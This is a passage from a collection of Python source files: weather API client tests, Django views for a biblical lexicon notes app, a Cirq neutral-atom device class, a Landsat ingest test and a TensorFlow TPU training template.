'https://api.climacell.co/v3/weather/forecast/hourly',\n params=expected_params,\n headers={'apikey': 'apikey'}\n )\n\n self.assertEqual(6, len(measurements))\n\n def test_hourly_invalid_start_time(self):\n client = Client('apikey')\n lat = 52.446023244274045\n lon = 4.819207798979252\n fields = [FIELD_TEMP, FIELD_DEW_POINT, FIELD_HUMIDITY]\n start_time = 'yesterday'\n\n self.assertRaises(\n ValueError, client.hourly, lat, lon, fields, start_time\n )\n\n def test_hourly_invalid_end_time(self):\n client = Client('apikey')\n lat = 52.446023244274045\n lon = 4.819207798979252\n fields = [FIELD_TEMP, FIELD_DEW_POINT, FIELD_HUMIDITY]\n start_time = 'now'\n end_time = 'tomorrow'\n\n self.assertRaises(\n ValueError, client.hourly, lat, lon, fields, start_time, end_time\n )\n\n @mock.patch('climacell.api.requests.get', side_effect=mock_requests_get)\n def test_hourly_valid_end_time(self, mock_get):\n client = Client('apikey')\n lat = 52.446023244274045\n lon = 4.819207798979252\n fields = [FIELD_TEMP, FIELD_DEW_POINT, FIELD_HUMIDITY]\n start_time = 'now'\n end_time = '2021-01-14T21:00:00.000Z'\n\n response = client.hourly(lat, lon, fields, start_time, end_time)\n self.assertFalse(response.has_error)\n\n expected_params = {\n 'lat': 52.446023244274045,\n 'lon': 4.819207798979252,\n 'start_time': 'now',\n 'unit_system': 'si',\n 'fields': join_fields([FIELD_TEMP, FIELD_DEW_POINT, FIELD_HUMIDITY]),\n 'end_time': '2021-01-14T21:00:00.000Z',\n }\n\n mock_get.assert_called_with(\n 'https://api.climacell.co/v3/weather/forecast/hourly',\n params=expected_params,\n headers={'apikey': 'apikey'}\n )\n\n @mock.patch('climacell.api.requests.get', side_effect=mock_requests_get)\n def test_nowcast(self, mock_get):\n client = Client('apikey')\n lat = 52.446023244274045\n lon = 4.819207798979252\n timestep = 30\n fields = [\n FIELD_TEMP,\n FIELD_DEW_POINT,\n FIELD_HUMIDITY,\n FIELD_WIND_SPEED,\n FIELD_WIND_GUST,\n FIELD_WIND_DIRECTION,\n FIELD_SUNRISE,\n FIELD_SUNSET,\n ]\n\n response = client.nowcast(lat=lat, lon=lon, fields=fields, timestep=timestep)\n measurements = response.get_measurements()\n\n expected_params = {\n 'lat': 52.446023244274045,\n 'lon': 4.819207798979252,\n 'timestep': 30,\n 'start_time': 'now',\n 'unit_system': 'si',\n 'fields': join_fields(fields),\n }\n\n mock_get.assert_called_with(\n 'https://api.climacell.co/v3/weather/nowcast',\n params=expected_params,\n headers={'apikey': 'apikey'}\n )\n # 13 timesteps, 8 measurements per timestep\n self.assertEqual(13 * 8, len(measurements))\n\n @mock.patch('climacell.api.requests.get', side_effect=mock_requests_get)\n def test_nowcast_valid_end_time(self, mock_get):\n client = Client('apikey')\n lat = 52.446023244274045\n lon = 4.819207798979252\n timestep = 30\n fields = [FIELD_TEMP]\n start_time = 'now'\n end_time = '2021-01-14T21:00:00.000Z'\n\n response = client.nowcast(\n lat=lat, lon=lon, fields=fields, timestep=timestep,\n start_time=start_time, end_time=end_time\n )\n\n self.assertFalse(response.has_error)\n\n expected_params = {\n 'lat': 52.446023244274045,\n 'lon': 4.819207798979252,\n 'timestep': 30,\n 'start_time': 'now',\n 'unit_system': 'si',\n 'fields': join_fields(fields),\n 'end_time': end_time\n }\n\n mock_get.assert_called_with(\n 'https://api.climacell.co/v3/weather/nowcast',\n params=expected_params,\n headers={'apikey': 'apikey'}\n )\n\n def test_nowcast_invalid_start_time(self):\n client = Client('apikey')\n lat = 52.446023244274045\n lon = 4.819207798979252\n timestep = 30\n fields = [FIELD_TEMP]\n start_time = 'yesterday'\n\n self.assertRaises(\n ValueError, client.nowcast, lat, lon, fields, timestep, start_time\n )\n\n def test_nowcast_invalid_end_time(self):\n client = Client('apikey')\n lat = 52.446023244274045\n lon = 4.819207798979252\n timestep = 30\n fields = [FIELD_TEMP]\n start_time = 'now'\n end_time = 'tomorrow'\n\n self.assertRaises(\n ValueError, client.nowcast, lat, lon, fields,\n timestep, start_time, end_time\n )\n\n @mock.patch('climacell.api.requests.get', side_effect=mock_requests_get)\n def test_daily(self, mock_get):\n client = Client('apikey')\n lat = 52.446023244274045\n lon = 4.819207798979252\n fields = [FIELD_TEMP, FIELD_DEW_POINT, FIELD_HUMIDITY]\n\n response = client.daily(lat=lat, lon=lon, fields=fields)\n measurements = response.get_measurements()\n\n expected_params = {\n 'lat': 52.446023244274045,\n 'lon': 4.819207798979252,\n 'start_time': 'now',\n 'unit_system': 'si',\n 'fields': join_fields([FIELD_TEMP, FIELD_DEW_POINT, FIELD_HUMIDITY]),\n }\n\n mock_get.assert_called_with(\n 'https://api.climacell.co/v3/weather/forecast/daily',\n params=expected_params,\n headers={'apikey': 'apikey'}\n )\n\n self.assertEqual(6, len(measurements))\n"} {"ext": "py", "sha": "1a30c9835e32ccd041b586efe95296a87922e426", "content": "import re\n\nfrom django.db.models import query, Min, F\nfrom django.views.generic import DetailView, ListView\nfrom django.views.generic.edit import UpdateView\nfrom django.urls import reverse\nfrom django.shortcuts import redirect\nfrom django.utils.http import is_safe_url\nfrom django.http import QueryDict\nfrom django.conf import settings\n\nfrom .views import get_font\nfrom .models import Notes, Source, Target\nfrom .filters import NotesFilter, SourceFilter\n\n\nclass SourceListView(ListView):\n model = Source\n context_object_name = 'source'\n template_name = 'lexicon/list_source.html'\n paginate_by = 100\n\n def get_queryset(self):\n qs = super().get_queryset() # .values('id', 'token', 'lemma', 'morph', 'strongs_no_prefix', 'book', 'chapter', 'verse', 'notes')\n filtered = SourceFilter(self.request.GET, queryset=qs)\n return filtered.qs.distinct()[:100]\n\n def get_context_data(self, *args, **kwargs):\n context = super().get_context_data(*args, **kwargs)\n context['filter'] = SourceFilter(self.request.GET)\n return context\n\n\n def get_context_data(self, *args, **kwargs):\n context = super().get_context_data(*args, **kwargs)\n context['filter'] = SourceFilter(self.request.GET)\n \n query_dict = QueryDict(mutable=True)\n for key,val in self.request.GET.items():\n # removing page here, might have to add pagination to this view in its own right\n if val and key != 'page':\n query_dict[key] = val\n \n context['query_dict'] = query_dict\n context['base_page'] = reverse('navigate_source') + '?' + query_dict.urlencode()\n\n return context\n \n\nclass NavigateSource(SourceListView):\n paginate_by = 1\n template_name = 'lexicon/navigate_source.html'\n\n def get_context_data(self, *args, **kwargs):\n context = super().get_context_data(*args, **kwargs)\n qs = self.get_queryset()\n # (<django.core.paginator.Paginator object at 0x7f1a605f99a0>, <Page 2 of 4>, <QuerySet [ix79: figs-euphemism]>, True)\n paginator = self.paginate_queryset(qs, self.get_paginate_by(qs))\n \n try:\n # gets the first element of the queryset of the selected page\n occurrence = paginator[2].first()\n except: \n # a fallback to show something, it will display the wrong text though (but the right note)\n occurrence = qs.first()\n\n context['occurrence'] = occurrence\n # context['source'] = Source.objects.filter(book=occurrence['book'], chapter=occurrence['chapter'], verse=occurrence['verse'])\n context['source'] = Source.objects.filter(book=occurrence.book, chapter=occurrence.chapter, verse=occurrence.verse)\n context['target'] = Target.objects.filter(book=occurrence.book, chapter=occurrence.chapter, verse=occurrence.verse)\n book_nr = int(occurrence.book.split('-')[0])\n if book_nr > 40:\n font = 'gk'\n else:\n font = 'hb'\n context['font'] = font\n\n # make sure you pass the GET parameters along\n query_dict = QueryDict(mutable=True)\n for key,val in self.request.GET.items():\n if val and key != 'page':\n query_dict[key] = val\n\n context['query_dict'] = query_dict\n context['url'] = reverse('navigate_source') + '?' + query_dict.urlencode()\n context['base_page'] = reverse('list_source') + '?' + query_dict.urlencode()\n\n # prepare some nagivation\n page = paginator[1]\n if page.has_previous(): \n context['previous_page'] = page.previous_page_number()\n if page.has_next():\n context['next_page'] = page.next_page_number()\n\n return context\n\n\n\nclass NotesListView(ListView):\n model = Notes\n context_object_name = 'notes'\n template_name = 'lexicon/list_notes.html'\n paginate_by = 100\n\n def get_queryset(self):\n qs = super().get_queryset().annotate(min_source=Min('source__id')).distinct().order_by(F('min_source').asc(nulls_last=True))\n filtered = NotesFilter(self.request.GET, queryset=qs)\n return filtered.qs.distinct()\n\n def get_context_data(self, *args, **kwargs):\n context = super().get_context_data(*args, **kwargs)\n context['filter'] = NotesFilter(self.request.GET)\n \n query_dict = QueryDict(mutable=True)\n for key,val in self.request.GET.items():\n # removing page here, might have to add pagination to this view in its own right\n if val and key != 'page':\n query_dict[key] = val\n \n context['base_page'] = reverse('navigate_notes') + '?' + query_dict.urlencode()\n\n return context\n\n\nclass NavigateNotes(NotesListView):\n paginate_by = 1\n template_name = 'lexicon/navigate_notes.html'\n\n def get_context_data(self, *args, **kwargs):\n context = super().get_context_data(*args, **kwargs)\n\n '''\n Here's the magic:\n\n Although this is a LIST View it really is used to only display a SINGLE object\n because it is paginated by 1.\n \n This is done so the entire queryset can be filtered by the user and the user can then\n go through each item in said queryset. \n\n This means that we need to add the actual information based on the paginated queryset here\n and not just the basic queryset. \n '''\n qs = self.get_queryset()\n # (<django.core.paginator.Paginator object at 0x7f1a605f99a0>, <Page 2 of 4>, <QuerySet [ix79: figs-euphemism]>, True)\n paginator = self.paginate_queryset(qs, self.get_paginate_by(qs))\n \n try:\n # gets the first element of the queryset of the selected page\n note = paginator[2].first()\n except: \n # a fallback to show something, it will display the wrong text though (but the right note)\n note = qs.first()\n\n context['source'] = Source.objects.filter(book=note.book, chapter=note.chapter, verse=note.verse)\n book_nr = int(note.book.split('-')[0])\n if book_nr > 40:\n font = 'gk'\n else:\n font = 'hb'\n context['font'] = font\n context['source'].first().strongs_no_prefix\n context['target'] = Target.objects.filter(book=note.book, chapter=note.chapter, verse=note.verse)\n\n # make sure you pass the GET parameters along\n query_dict = QueryDict(mutable=True)\n for key,val in self.request.GET.items():\n if val and key != 'page':\n query_dict[key] = val\n\n context['url'] = reverse('navigate_notes') + '?' + query_dict.urlencode()\n context['base_page'] = reverse('list_notes') + '?' + query_dict.urlencode()\n\n # prepare some nagivation\n page = paginator[1]\n if page.has_previous(): \n context['previous_page'] = page.previous_page_number()\n if page.has_next():\n context['next_page'] = page.next_page_number()\n\n return context\n\n\nclass NotesDetailView(DetailView):\n model = Notes\n pk_url_kwarg = 'index'\n context_object_name = 'note'\n\n def get_context_data(self, *args, **kwargs):\n context = super().get_context_data(*args, **kwargs)\n note = self.object\n context['source'] = Source.objects.filter(book=note.book, chapter=note.chapter, verse=note.verse)\n book_nr = int(note.book.split('-')[0])\n if book_nr > 40:\n font = 'gk'\n else:\n font = 'hb'\n context['font'] = font\n context['source'].first().strongs_no_prefix\n context['target'] = Target.objects.filter(book=note.book, chapter=note.chapter, verse=note.verse)\n context['previous_note'] = Notes.objects.filter(index__lt=note.index).order_by('-index').first()\n context['next_note'] = Notes.objects.filter(index__gt=note.index).order_by('index').first()\n\n return context\n\n\nclass NotesUpdateView(UpdateView):\n model = Notes\n pk_url_kwarg = 'index'\n context_object_name = 'note'\n fields = 'supportreference annotation sourceword sourcewordoccurrence'.split()\n\n def get_success_url(self):\n next_url = self.request.GET.get('next', None)\n # do not accept any url\n if is_safe_url(next_url, allowed_hosts=settings.ALLOWED_HOSTS):\n return next_url"} {"ext": "py", "sha": "1a30ca4d0ebc2232b34fda07933d3d20d520defa", "content": "numbers = list()\nwhile True:\n num = int(input('Insert a number: '))\n numbers.append(num)\n cont = str(input('Do you want to continue? [y/n]: ')).lower().strip()[0]\n while cont not in 'yn':\n cont = str(input('Do you want to continue? [y/n]: ')).lower().strip()[0]\n if cont == 'n':\n break\nprint(f'You inserted a total of {len(numbers)} numbers.')\nprint(f'The numbers, in descending order, are: {sorted(numbers, reverse=True)}.')\nif 5 in numbers:\n print(f'The number 5 appear {numbers.count(5)} times.')\nelse:\n print('The number 5 don\\'t appear in the list.')\n"} {"ext": "py", "sha": "1a30cad8a194e64f268edd1e1c6065f329126e9e", "content": "# Copyright 2018 The Cirq Developers\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# https://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport itertools\nimport collections\nfrom typing import Any, Iterable, cast, DefaultDict, TYPE_CHECKING, FrozenSet\nfrom numpy import sqrt\nfrom cirq import devices, ops, circuits, value\nfrom cirq.devices.grid_qubit import GridQubit\nfrom cirq.ops import raw_types\nfrom cirq.value import Duration\nfrom cirq.neutral_atoms import convert_to_neutral_atom_gates\n\nif TYPE_CHECKING:\n import cirq\n\n\ndef _subgate_if_parallel_gate(gate: 'cirq.Gate') -> 'cirq.Gate':\n \"\"\"Returns gate.sub_gate if gate is a ParallelGate, else returns gate\"\"\"\n return gate.sub_gate if isinstance(gate, ops.ParallelGate) else gate\n\n\ndef neutral_atom_gateset(max_parallel_z=None, max_parallel_xy=None):\n return ops.Gateset(\n ops.AnyIntegerPowerGateFamily(ops.CNotPowGate),\n ops.AnyIntegerPowerGateFamily(ops.CCNotPowGate),\n ops.AnyIntegerPowerGateFamily(ops.CZPowGate),\n ops.AnyIntegerPowerGateFamily(ops.CCZPowGate),\n ops.ParallelGateFamily(ops.ZPowGate, max_parallel_allowed=max_parallel_z),\n ops.ParallelGateFamily(ops.XPowGate, max_parallel_allowed=max_parallel_xy),\n ops.ParallelGateFamily(ops.YPowGate, max_parallel_allowed=max_parallel_xy),\n ops.ParallelGateFamily(ops.PhasedXPowGate, max_parallel_allowed=max_parallel_xy),\n ops.MeasurementGate,\n ops.IdentityGate,\n unroll_circuit_op=False,\n accept_global_phase_op=False,\n )\n\n\n@value.value_equality\nclass NeutralAtomDevice(devices.Device):\n \"\"\"A device with qubits placed on a grid.\"\"\"\n\n def __init__(\n self,\n measurement_duration: 'cirq.DURATION_LIKE',\n gate_duration: 'cirq.DURATION_LIKE',\n control_radius: float,\n max_parallel_z: int,\n max_parallel_xy: int,\n max_parallel_c: int,\n qubits: Iterable[GridQubit],\n ) -> None:\n \"\"\"Initializes the description of the AQuA device.\n\n Args:\n measurement_duration: the maximum duration of a measurement.\n gate_duration: the maximum duration of a gate\n control_radius: the maximum distance between qubits for a controlled\n gate. Distance is measured in units of the indices passed into\n the GridQubit constructor.\n max_parallel_z: The maximum number of qubits that can be acted on\n in parallel by a Z gate\n max_parallel_xy: The maximum number of qubits that can be acted on\n in parallel by a local XY gate\n max_parallel_c: the maximum number of qubits that can be acted on in\n parallel by a controlled gate. Must be less than or equal to the\n lesser of max_parallel_z and max_parallel_xy\n qubits: Qubits on the device, identified by their x, y location.\n Must be of type GridQubit\n\n Raises:\n ValueError: if the wrong qubit type is provided or if invalid\n parallel parameters are provided\n \"\"\"\n self._measurement_duration = Duration(measurement_duration)\n self._gate_duration = Duration(gate_duration)\n self._control_radius = control_radius\n self._max_parallel_z = max_parallel_z\n self._max_parallel_xy = max_parallel_xy\n if max_parallel_c > min(max_parallel_z, max_parallel_xy):\n raise ValueError(\n \"max_parallel_c must be less than or equal to the\"\n \"min of max_parallel_z and max_parallel_xy\"\n )\n self._max_parallel_c = max_parallel_c\n self.xy_gateset_all_allowed = ops.Gateset(\n ops.ParallelGateFamily(ops.XPowGate),\n ops.ParallelGateFamily(ops.YPowGate),\n ops.ParallelGateFamily(ops.PhasedXPowGate),\n unroll_circuit_op=False,\n accept_global_phase_op=False,\n )\n self.controlled_gateset = ops.Gateset(\n ops.AnyIntegerPowerGateFamily(ops.CNotPowGate),\n ops.AnyIntegerPowerGateFamily(ops.CCNotPowGate),\n ops.AnyIntegerPowerGateFamily(ops.CZPowGate),\n ops.AnyIntegerPowerGateFamily(ops.CCZPowGate),\n unroll_circuit_op=False,\n accept_global_phase_op=False,\n )\n self.gateset = neutral_atom_gateset(max_parallel_z, max_parallel_xy)\n for q in qubits:\n if not isinstance(q, GridQubit):\n raise ValueError(f'Unsupported qubit type: {q!r}')\n self.qubits = frozenset(qubits)\n\n def qubit_set(self) -> FrozenSet['cirq.GridQubit']:\n return self.qubits\n\n def qubit_list(self):\n return [qubit for qubit in self.qubits]\n\n def decompose_operation(self, operation: ops.Operation) -> ops.OP_TREE:\n return convert_to_neutral_atom_gates.ConvertToNeutralAtomGates().convert(operation)\n\n def duration_of(self, operation: ops.Operation):\n \"\"\"Provides the duration of the given operation on this device.\n\n Args:\n operation: the operation to get the duration of\n\n Returns:\n The duration of the given operation on this device\n\n Raises:\n ValueError: If the operation provided doesn't correspond to a native\n gate\n \"\"\"\n self.validate_operation(operation)\n if isinstance(operation, (ops.GateOperation, ops.ParallelGateOperation)):\n if isinstance(operation.gate, ops.MeasurementGate):\n return self._measurement_duration\n return self._gate_duration\n\n def validate_gate(self, gate: ops.Gate):\n \"\"\"Raises an error if the provided gate isn't part of the native gate set.\n\n Args:\n gate: the gate to validate\n\n Raises:\n ValueError: If the given gate is not part of the native gate set.\n \"\"\"\n if gate not in self.gateset:\n if isinstance(gate, (ops.CNotPowGate, ops.CZPowGate, ops.CCXPowGate, ops.CCZPowGate)):\n raise ValueError('controlled gates must have integer exponents')\n raise ValueError(f'Unsupported gate: {gate!r}')\n\n def validate_operation(self, operation: ops.Operation):\n \"\"\"Raises an error if the given operation is invalid on this device.\n\n Args:\n operation: the operation to validate\n\n Raises:\n ValueError: If the operation is not valid\n \"\"\"\n if not isinstance(operation, (ops.GateOperation, ops.ParallelGateOperation)):\n raise ValueError(f'Unsupported operation: {operation!r}')\n\n # All qubits the operation acts on must be on the device\n for q in operation.qubits:\n if q not in self.qubits:\n raise ValueError(f'Qubit not on device: {q!r}')\n\n if operation not in self.gateset and not (\n operation in self.xy_gateset_all_allowed and len(operation.qubits) == len(self.qubits)\n ):\n raise ValueError(f'Unsupported operation: {operation!r}')\n\n if operation in self.controlled_gateset:\n if len(operation.qubits) > self._max_parallel_c:\n raise ValueError(\n 'Too many qubits acted on in parallel by a controlled gate operation'\n )\n for p in operation.qubits:\n for q in operation.qubits:\n if self.distance(p, q) > self._control_radius:\n raise ValueError(f\"Qubits {p!r}, {q!r} are too far away\")\n\n def validate_moment(self, moment: ops.Moment):\n \"\"\"Raises an error if the given moment is invalid on this device.\n\n Args:\n moment: The moment to validate\n\n Raises:\n ValueError: If the given moment is invalid\n \"\"\"\n super().validate_moment(moment)\n\n CATEGORIES = {\n 'Z': (ops.ZPowGate,),\n 'XY': (\n ops.XPowGate,\n ops.YPowGate,\n ops.PhasedXPowGate,\n ),\n 'controlled': (\n ops.CNotPowGate,\n ops.CZPowGate,\n ops.CCXPowGate,\n ops.CCZPowGate,\n ),\n 'measure': (ops.MeasurementGate,),\n }\n\n categorized_ops: DefaultDict = collections.defaultdict(list)\n for op in moment.operations:\n assert isinstance(op, (ops.GateOperation, ops.ParallelGateOperation))\n for k, v in CATEGORIES.items():\n assert isinstance(v, tuple)\n gate = _subgate_if_parallel_gate(op.gate)\n if isinstance(gate, v):\n categorized_ops[k].append(op)\n\n for k in ['Z', 'XY', 'controlled']:\n if len(set(_subgate_if_parallel_gate(op.gate) for op in categorized_ops[k])) > 1:\n raise ValueError(f\"Non-identical simultaneous {k} gates\")\n\n num_parallel_xy = sum([len(op.qubits) for op in categorized_ops['XY']])\n num_parallel_z = sum([len(op.qubits) for op in categorized_ops['Z']])\n has_measurement = len(categorized_ops['measure']) > 0\n controlled_qubits_lists = [op.qubits for op in categorized_ops['controlled']]\n\n if sum([len(l) for l in controlled_qubits_lists]) > self._max_parallel_c:\n raise ValueError(\"Too many qubits acted on by controlled gates\")\n if controlled_qubits_lists and (num_parallel_xy or num_parallel_z):\n raise ValueError(\n \"Can't perform non-controlled operations at same time as controlled operations\"\n )\n if self._are_qubit_lists_too_close(*controlled_qubits_lists):\n raise ValueError(\"Interacting controlled operations\")\n\n if num_parallel_z > self._max_parallel_z:\n raise ValueError(\"Too many simultaneous Z gates\")\n\n if num_parallel_xy > self._max_parallel_xy and num_parallel_xy != len(self.qubits):\n raise ValueError(\"Bad number of simultaneous XY gates\")\n\n if has_measurement:\n if controlled_qubits_lists or num_parallel_z or num_parallel_xy:\n raise ValueError(\"Measurements can't be simultaneous with other operations\")\n\n def _are_qubit_lists_too_close(self, *qubit_lists: Iterable[raw_types.Qid]) -> bool:\n if len(qubit_lists) < 2:\n return False\n if len(qubit_lists) == 2:\n a, b = qubit_lists\n return any(self.distance(p, q) <= self._control_radius for p in a for q in b)\n return any(\n self._are_qubit_lists_too_close(a, b) for a, b in itertools.combinations(qubit_lists, 2)\n )\n\n def can_add_operation_into_moment(self, operation: ops.Operation, moment: ops.Moment) -> bool:\n \"\"\"Determines if it's possible to add an operation into a moment.\n\n An operation can be added if the moment with the operation added is valid.\n\n Args:\n operation: The operation being added.\n moment: The moment being transformed.\n\n Returns:\n Whether or not the moment will validate after adding the operation.\n\n Raises:\n ValueError: If either of the given moment or operation is invalid\n \"\"\"\n if not super().can_add_operation_into_moment(operation, moment):\n return False\n try:\n self.validate_moment(moment.with_operation(operation))\n except:\n return False\n return True\n\n def validate_circuit(self, circuit: circuits.AbstractCircuit):\n \"\"\"Raises an error if the given circuit is invalid on this device.\n\n A circuit is invalid if any of its moments are invalid or if there is a\n non-empty moment after a moment with a measurement.\n\n Args:\n circuit: The circuit to validate\n\n Raises:\n ValueError: If the given circuit can't be run on this device\n \"\"\"\n super().validate_circuit(circuit)\n\n # Measurements must be in the last non-empty moment\n has_measurement_occurred = False\n for moment in circuit:\n if has_measurement_occurred:\n if len(moment.operations) > 0:\n raise ValueError(\"Non-empty moment after measurement\")\n for operation in moment.operations:\n if isinstance(operation.gate, ops.MeasurementGate):\n has_measurement_occurred = True\n\n def _value_equality_values_(self) -> Any:\n return (\n self._measurement_duration,\n self._gate_duration,\n self._max_parallel_z,\n self._max_parallel_xy,\n self._max_parallel_c,\n self._control_radius,\n self.qubits,\n )\n\n def __repr__(self) -> str:\n return (\n 'cirq.NeutralAtomDevice('\n f'measurement_duration={self._measurement_duration!r}, '\n f'gate_duration={self._gate_duration!r}, '\n f'max_parallel_z={self._max_parallel_z!r}, '\n f'max_parallel_xy={self._max_parallel_xy!r}, '\n f'max_parallel_c={self._max_parallel_c!r}, '\n f'control_radius={self._control_radius!r}, '\n f'qubits={sorted(self.qubits)!r})'\n )\n\n def neighbors_of(self, qubit: 'cirq.GridQubit') -> Iterable['cirq.GridQubit']:\n \"\"\"Returns the qubits that the given qubit can interact with.\"\"\"\n possibles = [\n GridQubit(qubit.row + 1, qubit.col),\n GridQubit(qubit.row - 1, qubit.col),\n GridQubit(qubit.row, qubit.col + 1),\n GridQubit(qubit.row, qubit.col - 1),\n ]\n return [e for e in possibles if e in self.qubits]\n\n def distance(self, p: 'cirq.Qid', q: 'cirq.Qid') -> float:\n p = cast(GridQubit, p)\n q = cast(GridQubit, q)\n return sqrt((p.row - q.row) ** 2 + (p.col - q.col) ** 2)\n\n def __str__(self) -> str:\n diagram = circuits.TextDiagramDrawer()\n\n for q in self.qubits:\n diagram.write(q.col, q.row, str(q))\n for q2 in self.neighbors_of(q):\n diagram.grid_line(q.col, q.row, q2.col, q2.row)\n\n return diagram.render(horizontal_spacing=3, vertical_spacing=2, use_unicode_characters=True)\n"} {"ext": "py", "sha": "1a30cb28cfe924fdc6b5e5a99d42e03591c0a0d2", "content": "\"\"\"Tests related to creating ingest definition\"\"\"\n\nimport json\nimport os\nimport unittest\n\nfrom rf.models import Scene\nfrom rf.ingest.landsat8_ingest import get_landsat8_layer\n\nclass Landsat8LayerTestCase(unittest.TestCase):\n \"\"\"Test that we can create a layer from Landsat 8 scenes\"\"\"\n\n def setUp(self):\n cwd = os.path.abspath(os.path.dirname(__file__))\n scene_path = os.path.join(cwd, 'data', 'scene.json')\n with open(scene_path) as fh:\n self.scene = Scene.from_dict(json.load(fh))\n\n def test_create_layer(self):\n \"\"\"Minimal test to verify that a layer can be created\"\"\"\n layer = get_landsat8_layer(self.scene)\n num_sources = len(layer.sources)\n self.assertEqual(\n num_sources, 11, 'Found {} sources, expected 11'.format(num_sources)\n )\n\n\n"} {"ext": "py", "sha": "1a30cc3695724c9c29237602f5781066bcb092bd", "content": "# Copyright 2018 Google LLC\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\nimport argparse\nimport numpy as np\nimport tensorflow as tf\n\nNUM_CLASSES = 10\nEMBEDDING_DIM = 7\n\n\ndef model_fn(features, labels, mode, params):\n # build model\n global_step = tf.train.get_global_step()\n\n embedding_table = tf.get_variable('embedding_table', shape=(NUM_CLASSES, EMBEDDING_DIM), dtype=tf.float32)\n\n embeddings = tf.nn.embedding_lookup(embedding_table, features)\n\n # lstm model\n batch_size = params['train_batch_size']\n sequence_length = params['sequence_length']\n\n cell = tf.nn.rnn_cell.BasicLSTMCell(EMBEDDING_DIM)\n outputs, final_state = tf.nn.dynamic_rnn(cell, embeddings, dtype=tf.float32)\n\n # flatten the batch and sequence dimensions\n flattened = tf.reshape(outputs, (-1, EMBEDDING_DIM))\n flattened_logits = tf.layers.dense(flattened, NUM_CLASSES)\n\n logits = tf.reshape(flattened_logits, (-1, sequence_length, NUM_CLASSES))\n\n predictions = tf.multinomial(flattened_logits, num_samples=1)\n loss = None\n train_op = None\n\n if mode == tf.estimator.ModeKeys.TRAIN:\n # define loss\n loss = tf.reduce_mean(tf.nn.sparse_softmax_cross_entropy_with_logits(labels=labels, logits=logits))\n\n # define train_op\n optimizer = tf.train.RMSPropOptimizer(learning_rate=0.05)\n\n # wrapper to make the optimizer work with TPUs\n if params['use_tpu']:\n optimizer = tf.contrib.tpu.CrossShardOptimizer(optimizer)\n\n train_op = optimizer.minimize(loss, global_step=global_step)\n\n if params['use_tpu']:\n # TPU version of EstimatorSpec\n return tf.contrib.tpu.TPUEstimatorSpec(\n mode=mode,\n predictions=predictions,\n loss=loss,\n train_op=train_op)\n else:\n return tf.estimator.EstimatorSpec(\n mode=mode,\n predictions=predictions,\n loss=loss,\n train_op=train_op)\n\n\ndef train_input_fn(params={}):\n # make some fake data of labels\n data_length = 100\n x = np.random.randint(0, NUM_CLASSES, data_length)\n y = np.random.randint(0, NUM_CLASSES, data_length)\n\n x_tensor = tf.constant(x, dtype=tf.int32)\n y_tensor = tf.constant(y, dtype=tf.int32)\n\n dataset = tf.data.Dataset.from_tensors((x_tensor, y_tensor))\n dataset = dataset.repeat()\n\n # TPUs need to know the full shape of tensors\n # so we use a fixed sequence length\n sequence_length = params.get('sequence_length', 5)\n\n def get_sequences(x_tensor, y_tensor):\n index = tf.random_uniform([1], minval=0, maxval=data_length-sequence_length, dtype=tf.int32)[0]\n\n x_sequence = x_tensor[index:index+sequence_length]\n y_sequence = y_tensor[index:index+sequence_length]\n\n return (x_sequence, y_sequence)\n\n dataset = dataset.map(get_sequences)\n\n # TPUEstimator passes params when calling input_fn\n batch_size = params.get('train_batch_size', 16)\n dataset = dataset.batch(batch_size, drop_remainder=True)\n\n # TPUs need to know all dimensions when the graph is built\n # Datasets know the batch size only when the graph is run\n def set_shapes(features, labels):\n features_shape = features.get_shape().merge_with([batch_size, sequence_length])\n labels_shape = labels.get_shape().merge_with([batch_size, sequence_length])\n\n features.set_shape(features_shape)\n labels.set_shape(labels_shape)\n\n return features, labels\n\n dataset = dataset.map(set_shapes)\n dataset = dataset.prefetch(tf.contrib.data.AUTOTUNE)\n\n return dataset\n\n\ndef main(args):\n # pass the args as params so the model_fn can use\n # the TPU specific args\n params = vars(args)\n\n if args.use_tpu:\n # additional configs required for using TPUs\n tpu_cluster_resolver = tf.contrib.cluster_resolver.TPUClusterResolver(args.tpu)\n tpu_config = tf.contrib.tpu.TPUConfig(\n num_shards=8, # using Cloud TPU v2-8\n iterations_per_loop=args.save_checkpoints_steps)\n\n # use the TPU version of RunConfig\n config = tf.contrib.tpu.RunConfig(\n cluster=tpu_cluster_resolver,\n model_dir=args.model_dir,\n tpu_config=tpu_config,\n save_checkpoints_steps=args.save_checkpoints_steps,\n save_summary_steps=100)\n\n # TPUEstimator\n estimator = tf.contrib.tpu.TPUEstimator(\n model_fn=model_fn,\n config=config,\n params=params,\n train_batch_size=args.train_batch_size,\n eval_batch_size=32,\n export_to_tpu=False)\n else:\n config = tf.estimator.RunConfig(model_dir=args.model_dir)\n\n estimator = tf.estimator.Estimator(\n model_fn,\n config=config,\n params=params)\n\n estimator.train(train_input_fn, max_steps=args.max_steps)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n\n parser.add_argument(\n '--model-dir',\n type=str,\n default='/tmp/tpu-template',\n help='Location to write checkpoints and summaries to. Must be a GCS URI when using Cloud TPU.')\n parser.add_argument(\n '--max-steps',\n type=int,\n default=1000,\n help='The total number of steps to train the model.')\n parser.add_argument(\n '--sequence-length',\n type=int,\n default=5,\n help='The sequence length for an LSTM model.')\n parser.add_argument(\n '--train-batch-size',\n type=int,\n default=16,\n help='The training batch size. The training batch is divided evenly across the TPU cores.')\n parser.add_argument(\n '--save-checkpoints-steps',\n type=int,\n default=100,\n help='The number of training steps before saving each checkpoint.')\n parser.add_argument(\n '--use-tpu',\n action='store_true',\n help='Whether to use TPU.')\n parser.add_argument(\n '--tpu',\n default=None,\n help='The name or GRPC URL of the TPU node. Leave it as `None` when training on AI Platform.')\n\n args, _ = parser.parse_known_args()\n\n main(args)\n"} {"ext": "py", "sha": 